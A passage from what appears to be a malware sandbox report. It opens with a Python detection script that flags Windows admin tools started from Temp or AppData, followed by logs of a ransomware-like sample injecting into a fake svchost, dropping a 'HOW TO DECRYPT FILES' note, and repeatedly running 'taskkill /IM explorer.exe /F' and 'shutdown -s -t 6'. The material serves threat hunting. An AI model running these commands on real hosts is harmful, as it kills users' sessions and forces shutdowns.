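    r"PID 2212 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe",
    r"PID 2212 wrote to memory of 704 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe",
    r"PID 2212 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\shutdown.exe",
    r"PID 2212 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe",
    r"PID 2212 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\shutdown.exe",
    r"PID 2212 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe",
]


def analyse(rows):
    """Collapse repeated rows into one record per child and attach privileges."""
    spawns = {}                      # child pid -> {ppid, parent image, child image}
    privileges = defaultdict(set)    # child image basename -> privileges enabled
    for row in rows:
        row = row.strip()
        m = WRITE_RE.match(row)
        if m:
            ppid, cpid, parent, child = m.groups()
            spawns[int(cpid)] = {"ppid": int(ppid), "parent": parent, "child": child}
            continue
        m = TOKEN_RE.match(row)
        if m:
            priv, image = m.groups()
            privileges[PureWindowsPath(image).name.lower()].add(priv)

    flagged = []
    for cpid, rec in sorted(spawns.items()):
        child_name = PureWindowsPath(rec["child"]).name.lower()
        parent_in_user_dir = any(p in rec["parent"].lower() for p in USER_WRITABLE)
        # A built-in admin tool started by a binary in a user-writable directory
        # is the hunt-worthy combination; the enabled privileges say what it can do.
        if child_name in LOLBINS and parent_in_user_dir:
            flagged.append({
                "pid": cpid,
                "image": child_name,
                "parent_pid": rec["ppid"],
                "privileges": sorted(privileges.get(child_name, ())),
            })
    return {
        "spawns": spawns,
        "privileges": {name: sorted(privs) for name, privs in privileges.items()},
        "lolbins_from_user_dir": flagged,
    }


if __name__ == "__main__":
    result = analyse(SAMPLE_ROWS)
    print(f"{len(result['spawns'])} distinct children")
    for finding in result["lolbins_from_user_dir"]:
        print(finding)
```

For endpoint telemetry the equivalent rule keys on the parent image path rather than on PIDs: a process started from a Temp or AppData directory that spawns shutdown.exe or taskkill.exe is the behaviour to alert on, and the privilege rows explain what happens next on the host (forced process termination, then a reboot into a system whose SysWOW64 binaries were rewritten).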

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2212 wrote to memory of 2516 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Users\Admin\AppData\Local\Tempsvchost.exe
PID 2212 wrote to memory of 2516 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Users\Admin\AppData\Local\Tempsvchost.exe
PID 2212 wrote to memory of 2516 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Users\Admin\AppData\Local\Tempsvchost.exe
PID 2212 wrote to memory of 2516 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Users\Admin\AppData\Local\Tempsvchost.exe
PID 2212 wrote to memory of 704 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 704 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 704 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 1380 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 1380 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 1380 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 1668 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 1668 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 1668 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 884 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 884 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 884 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 2504 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2504 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2504 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2136 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 2136 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 2136 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 2288 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2288 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2288 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 864 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 864 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 864 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 1980 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 1980 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 1980 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2880 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 2880 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 2880 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 2784 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2784 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2784 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2688 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 2688 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 2688 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 2292 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2292 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2292 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 1512 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 1512 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 1512 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 2332 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2332 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2332 | N/A | C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe | C:\Windows\system32\taskkill.exe

Processes

C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe

"C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe"

C:\Users\Admin\AppData\Local\Tempsvchost.exe

"C:\Users\Admin\AppData\Local\Tempsvchost.exe"

C:\Windows\system32\taskkill.exe

taskkill /IM explorer.exe /F

C:\Windows\system32\shutdown.exe

shutdown -s -t 6

C:\Windows\system32\taskkill.exe

taskkill /IM explorer.exe /F

C:\Windows\system32\shutdown.exe

shutdown -s -t 6

C:\Windows\system32\taskkill.exe

taskkill /IM explorer.exe /F

C:\Windows\system32\shutdown.exe

shutdown -s -t 6

C:\Windows\system32\taskkill.exe

taskkill /IM explorer.exe /F

C:\Windows\system32\shutdown.exe

shutdown -s -t 6

C:\Windows\system32\taskkill.exe

taskkill /IM explorer.exe /F

C:\Windows\system32\shutdown.exe

shutdown -s -t 6

C:\Windows\system32\taskkill.exe

taskkill /IM explorer.exe /F

C:\Windows\system32\shutdown.exe

shutdown -s -t 6

C:\Windows\system32\taskkill.exe

taskkill /IM explorer.exe /F

C:\Windows\system32\shutdown.exe

shutdown -s -t 6

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

C:\Windows\system32\taskkill.exe

taskkill /IM explorer.exe /F

C:\Windows\system32\shutdown.exe

shutdown -s -t 6

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x1

Network

N/A

Files

memory/2212-0-0x000007FEF5DAE000-0x000007FEF5DAF000-memory.dmp

memory/2212-1-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

memory/2212-2-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

memory/2212-4-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

C:\Users\Admin\AppData\Local\Tempsvchost.exe

MD5 e40c6c092f093bd84544c46b75136212
SHA1 4e572fb842cbe318f6387d254741045f7bf5b230
SHA256 0eff6a71d9bd1549d4c12bc984ed722b9139f75615d4adcb49f9ec240afe9d7d
SHA512 d4f2c0f2f9dab7349036f73310b8a6d07e663ed664b9b14333f463d14cc9aa2c35759c3714419101787b3d0204d522948f893d649f6edb0e5efe8a847da9117f

C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\HOW TO DECRYPT FILES.txt

MD5 2efe72d837aed462e887ad524a404ebd
SHA1 44f65243eb459429e9d211db025e6cfc0ae9a67e
SHA256 35ee67934b321d71018d810616bda2b0b1687ca155a9a1654f82417d9b241e89
SHA512 9c49721f11d486212f42764e8fc857a65a3e80aabc7901ab0df6b860b8151ab1a8cd6b8e6cf6402f907aa12f28d6c4e900094b9db05927d850b255e8c51a4a46

memory/2212-24-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

memory/2516-38-0x0000000000400000-0x00000000006F6000-memory.dmp

C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif

MD5 f1b3fc5195c30349ce13afc21a40a06f
SHA1 1f51ed442a823175c935406748cae8c6d618027f
SHA256 2d6962dbb761594623f60e895127dc123f9e246f8845c9fdbd4dee8f945f6069
SHA512 6ab381d3d462308e2dcb73d04732340ca137c8464677d9ec0db43002e406d847f588e7ec15a164d93b557aacc06f149e92ad65de2d419f81f5a75703920f8ca0

C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\license.html

MD5 1d6c8d00aae68da0789330109f33c6a3
SHA1 5b6a622e617269a8fbe591f988ce9b6aecc3baa7
SHA256 f6eb04d8760c6d01bf408c45507fa182d2465800e46c2dc3cf8b71b59f511a81
SHA512 827685142c40781f9a4e0ccf68dbe4ab784a05cbeb1c7df1d6dffdadbc2a8de4b09e47eed31aae62e195081f6698cc27b520127b489dac11bb2f38d283faeaa2

C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html

MD5 fec64b0080be113f3a329fbb2185a7ef
SHA1 9babc7facc8b38ab97344d61b735febde815b5c5
SHA256 6b1285f0594ae2551ccc66f1ba35ac410ecaecc58645ed375b7b56cfe3a98b56
SHA512 26a81b6de96119f0323de19933805086f6f58eea7b0f44eb8a5b35897264cc28cd2f8e35d38b2f4469afe4b1a782f1a4e8903abcf663e2326afc97df8a05166c

C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt

MD5 f344d4dba1cabd6f821a8b6260e44b0e
SHA1 30368cc2682f144b87713686ca60caddb989d222
SHA256 b9fab55ff249d16a87165233fd38a1d34214dde7003f8c5c319deb81cd514e36
SHA512 545686dfe13a4ce8de9a434877c238535fef6d1f4e9e03e75722e96803cf487efee20e1923ec74a27608cf1dacd3b20067a9aa39213f32494505f4c81f06d8f7

C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt

MD5 7a0f570f1b04a822d4af7097b552861f
SHA1 1db485335ec5f38905a82a322994abf5881e3e9c
SHA256 586e03ac9aba339dbe88a0160a41ad292ae5865a393731027ccbb58334b43dfb
SHA512 7c6684f7143f82e71a69589f90d1a7af704786463f7d4624e27206dd4918cdab3dfcb00f5a24b03d37aa14b46d20b11161c7069c0138c011cf9ae08473cfc2cc

C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt

MD5 8a1a404d61b0c743b8ae97c9c849bf85
SHA1 adbb3e748b098560abb944ad8a862c26d4eed194
SHA256 3500ab5c93050534edcfa67ddaa080caf02ac1ddb7de820fc7bcba460f3f1c87
SHA512 b343073abf4890b7ab81b18657c04a9773744dad0f6e412eab975aa80f70d054fe210cd60e77aa443fef8a2ed4965cdea0b1048c81612af5e0534085d56592c1

C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_ON.GIF

MD5 87cefb82e0c0c8de490420228457e396
SHA1 da019e578d776573005db4b33282dd1b0b9a1707
SHA256 9b74ff61803ba2db58a442814e1b079a2b19590a8a23e6c9724468e94c3697e7
SHA512 a7de442e22dabeaab1d1813022c501d55cd1b40da0273f8777d14975337fcbb46a982729bc5578ad0494dac550298b7fc9e71d290fe306fde43244c6300a30e9

C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_OFF.GIF

MD5 18dae81d6188757aff0bb5cd8db1acf2
SHA1 b424f6fa01a505b4b2b63b5a9eddcc1118b1f3b9
SHA256 982903208613c73959b691bd447d9c051bf8203fa6cd1908e3c741b164bcc11a
SHA512 49c6e2ad3892ef4e2e8bd9781bc7f09155899602b76346934be75afe2c3a72e43ff5527f6916fc6da34ba0e9ff8333f167e9eb99e26b80c3174f15470d118af0

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\BG_ADOBE.GIF

MD5 dd267901fc9b2d13f272b569ca981f55
SHA1 52bba02b91956301ce96eff538b14abb2fe72487
SHA256 b668671fabe95bd8fa99e14c155d8bd6d57b18d12ae0576881195577ba995d4f
SHA512 28a6c31ffdcd253fb2da59662c87930c2774020b39bed4e7ed9fded27b40a31ab669eae78c127c4b7c96824bfbe8d75a8e44bd538d94de4b447ecab00403b760

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Casual.gif

MD5 7c57732204c9ae51038991d4bc23984e
SHA1 b1b5686453f759fd6bd006027298ce0efe926bd8
SHA256 ea43998179bad0fcbd951eb9e7dcfeb2bad5ba73146df11141f1a91b9a8261ff
SHA512 84b58a93f97a6d1866bcb8835bfad37f28d371c8db8f30669b7685b01285556ecc548e30796a89725893b47b7374031e53a8e116f82eecae199e05724b5b3ab9

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Country.gif

MD5 bfa5645f12b664a8c4a19873dacb7891
SHA1 518eccf24ad3d4862d43ffa85baf0ceb2ccc9fd0
SHA256 64f8be06ee33e3ac44c03d367b3a903ff016cc7d978e52fe8b1c3b9fb5945a50
SHA512 123e74de5f063e48f9eb009fcc2c18ba247209b9db94b74e267c7738d023504a41e6db599a3dfb11a9da2cac8e88f03a2cfa2d1a3ef3d0cd2247e3e41872d61d

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Earthy.gif

MD5 bf23aaaf4ac0ef0c6d29187155053036
SHA1 f35e77988728501a7695371f342bf7f5492de486
SHA256 aef7531ca1b1c41269f845949d2a33de6adfe4ee0fcdca9129fb11d37897c37f
SHA512 dd10bb54f8d70060fef2227c1a4bfdff5e178e598324a55f24f46ee57c57f069a8ce6cc45adab9a802bdd244243577b195d8511d1277ef837530debd7c260357

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Groove.gif

MD5 dca47a4816b9334dfafc73ac42f8412a
SHA1 5b94865a1aeec4a0a0116ad7aea41ae8b50d363a
SHA256 c52e6c9d36b1b41cefe234549b2f96f7a65e8281851c8112607052c4c0ab3b82
SHA512 1ab316f2c0a1cac59c298e77260867642156488e84d1bad53507aad68e464490c0101b6ea0408cb8e1d38c27fe820fcbd4602830b134b497ced52a9c5e8730ec

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_GreenTea.gif

MD5 d31084eeb5e748028faf01f67a60643b
SHA1 99db7519c1c7edc14dec8fd453f698ad8a3dcdda
SHA256 98cb91a681d204a66740fbb9868aee363df4307e367077ab887fcb03485d64a8
SHA512 30c9d6c6070e395b8df8b27e460c5047647f7e214de9b43bfd51a67cba99f03149debcef45083424516b9d797caffb214f1131bc1cf319a8a25d0a9a30f5a362

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_LightSpirit.gif

MD5 ab12094e7f872f1e7b0e926ca89da5b2
SHA1 f4af21df4859564188b66026c2591f53f50b2e98
SHA256 27dd924dbe93065f82dd434c06ba059185170a1ccf22c2b568e4f5ac33e9539b
SHA512 3f843f5fa467df7315a860d60d2d937970484602a282c282403a769fc02aa476ab060040a5d7cdad8d1a2fc6bba249a214d985c472b3368d4eb26264cad9f276

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_OliveGreen.gif

MD5 2e8dc82a584dd87bee445d490cbce817
SHA1 ae9ef7384c22b231c1283ba96a848a8ca059cf46
SHA256 a15b3f04e031ba60201b262d5516d4f16df3fa5017be2302d7f60e7a72e55bd1
SHA512 d272b0d201a9abb01605f31ffb9e8d345613c2b900bba3bdd99f4703cf2990d583093c5b3f8e86fe256d3a8dcaab9695437ffcd1814db5f4855c39eb4813b51f

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Premium.gif

MD5 eeb0af363dc6edc8fad362e743b47936
SHA1 93e4fa04a75258b611693326d3383133060e8528
SHA256 4de94df4aaccc940cda249c329ccfd5489bdf595b887e2ba665671428d76faaa
SHA512 70748623f5073d0687a79459f94a637b45878da5d9e6bce25fce049d36e3855dae3f840253f3a570058224dc4c697109e6af53afe6113c2ad8871409ef561e0e

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_SlateBlue.gif

MD5 fc0f397f9ed2fbde4d3c82868d84f592
SHA1 b923563bfa7a687d2af4a754e6a611be1c87671a
SHA256 0922cd587ea1cabab2726f8b2402ada0f389fff78dc55635035feeb218313cac
SHA512 bc1ea69af54f5c81ee8ec485458347a27141a7ec3872fc63720f6357f68a99746291e350c3c74920d147eb53833d8104f08e2fce55960dbea0f3ca97ae9c648d

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_TexturedBlue.gif

MD5 7e8e32dda4d20382a8cc6e92d330033d
SHA1 6fa9837e64c9208c1415fcc205001871169a5b28
SHA256 70d44907de4fe1b01d15a4b8d27811cbaa0e3aa6333a2461bf70affc15b68c32
SHA512 9e70f8fa92ee1dbb392cd0cd80bb380877502d5afacfbd2d587d0e29acd617b264d2aeedec78e98c3031012df227ff71764c485aa8b8a9b23c5a26d2aa4eff30

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_VelvetRose.gif

MD5 421a25d5fe24ef64034274056f0a4758
SHA1 ec9a767dabe20bb26da3955e69aa0ae5a8968368
SHA256 f4d56c3e6ead47049942110404d6697d9c074913649ffa111baf10dcb5c987a7
SHA512 e945fee0c83fc653ef98b5b9e857df272d1d9d599799184850a0aee6eb9a24fd9633b185f6ddd7ec4179d172ecef021e64641b9409917164e48137546595c9c4

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\BUTTON.GIF

MD5 7fa34541619d37be4f0d2ed9342fd8ca
SHA1 b1dba7c212e36a8fd518308787b661ab7ba66e1b
SHA256 2486eb734ed2de398ccde861d201036860b7bbd26f94243ec692cceb3c0804da
SHA512 12d4da96ff5e89683b5d67bded100932cd265e86a787ff2365563eb77b25df528e5714be5497c0f320e5ae0a052f50366cb12408cb153e28fee5bee7addba722

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_OFF.GIF

MD5 9262de6465e67e232093f1b69c6308f5
SHA1 1c8ac6443c46975afb12824a191ea3991e82ac2e
SHA256 e2f5835a7b30b9d92f34178436a979eb0c7c597e42366da14c6743570b5c4e7d
SHA512 4d0424ed55caac930d9f02e0c6b7a69d0f6d3d17e76430a1e6e2deef4e07a40017e3377f348194db29293a79f07c9a369a7a800ddcad9dc982fb4427ed8dc346

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_ON.GIF

MD5 23764a6b4a9412af319c5eda693f6f23
SHA1 634a9dec011deb1bf7f2fe9538993fa5bb1087f6
SHA256 ff05d2c86af5a5e3ce3a4583e6b78abcee64f4279b27e4e8581f1ddeeb4b4315
SHA512 6b943546ce9acaab30349265d085c8c3f77ae96c4e516bc5ee68b62ea14d42f0fa61302cb028358dc3f45c3c4ccc205b603d55bce38d025d096ea87722e0bfae

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\tab_off.gif

MD5 cd5af548414f41d080df08313fb849b0
SHA1 f56d0478479fc5379e1d136f235950793fb8c730
SHA256 890310e10b9e252cfc072f580a1a4ac250e7ebd86a86717d26be294fb71abb9f
SHA512 024a50788ebca411fd3a3bc80d2faaf2cf401119cf1ccffaf0d06f4f3e7e840e47b68a18878475b721dc0257f1bbd3af1f2c21d1e6055ccb1a211a704a317d8b

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\tab_on.gif

MD5 473b80c4bc025e928153a52d7521d4d5
SHA1 b697417dd29db6217148359c429900558c2c1c2f
SHA256 da8858b39bc2118c958a437911df15a147dfc36a5a09cf2524e83b93e13037e2
SHA512 aa23f43b3df33a814e86996ccd8f0c051e3b945c586493daae307827d8c37a4e7ddbf352765d85e043ad1223c9ee9a89ff19e1743d76c3eb85e744d855dde50f

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrow.jpg

MD5 5ad43b1349f8908a8cb047d5af02bbed
SHA1 ecb458c989c3bfd571358abcf4587a792205b488
SHA256 f4f46e26f7306ce4df20c08423d8b37668c375a208547ebe08f740c9a93f067c
SHA512 1d9032e347033b1adc55239b8859fd9ff4500c109414ca5399e5c9ad1b7f77e55621617ee1fd55f81581c68e83e084e6db3e68ea5d972f9f854a62812b32b529

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrowMask.bmp

MD5 0baa41df5300cf3d169dc7c7674e703c
SHA1 491aa98464b5142920026768b6fa6dd5ef1fe8fd
SHA256 b1dd0f4261ae43ba437e6c5c569372165358dae0d19382094cf7c59b6a3d0c17
SHA512 e89f9632245a028f0670a646bc9445040aca1f4de8253c302c052a71a50f98e81cb19e3b22770953d2223c92360dff4493e54a4f7509b317e28a9b6423720ef2

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\attention.gif

MD5 a1ffdb4a65e45f547055139c5c597925
SHA1 0bcb6798800e46b15257c2e98ee382982211808b
SHA256 52b1df2cce3df9619e1673df58b8bf3a69acc1343e27d63b325cec40b9584878
SHA512 7cbacf8faa5d727691d6eda1abd67ecff51f53da4e6e722719cb4aa94abd72bdee6dca9911d1c53e3f2c5d53c8aba497fb30d7d7ea2586a48327b819fdd12381

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_FormsHomePageBlank.gif

MD5 9ee8f0948ebb035fedd89f64887da142
SHA1 12531d6d282df98fd80c478379d282776e264ebd
SHA256 2f828d2e3ed7813ed93c2dcb7b6c8e7d714ac0a9890fd8d700ed6b214c504122
SHA512 8eeaa59bec3b973e86651b3997e32fa86dbb88dda9844108de2fd688ca8eb4856646f30319b41b56d02a8eb5bc4fe3f9b1b98be5456ea5296c3d80be38cbd8b5

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\HEADER.GIF

MD5 48df60fea6f30037d3de7330157aba12
SHA1 313e4b669fe319d075995fec9f17391e760310d3
SHA256 56f25a02278bc29561bec799bc3791293284883dcac99afa3114c112d9b6bd0c
SHA512 a639d22f6f524232fb50df254cb5ce9b8c4b70686424f9596646e9ec7f7825a9e90585a08c5601b78a1d572791f1c31801a1590d9cbdb2c04886de783caaf4e8

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\background.gif

MD5 07df3b3b575cc49e5573cdde9f5dcc9e
SHA1 e6a516e5d5345f9a6d8c9ccd6b723a047e7a6b4c
SHA256 6be3af459f07154a136fe3aa491331a939a437a22dcf6504f5ee02c2c67e1a5e
SHA512 23b7bfc185d09477a7b21c0f5f07c6b2ccbabe377c95d30074abf8bdd9a1606fab5dad47fc7c6f26e72aa182c0cde78bdabc60a214b34e9c0e469090ab426ce6

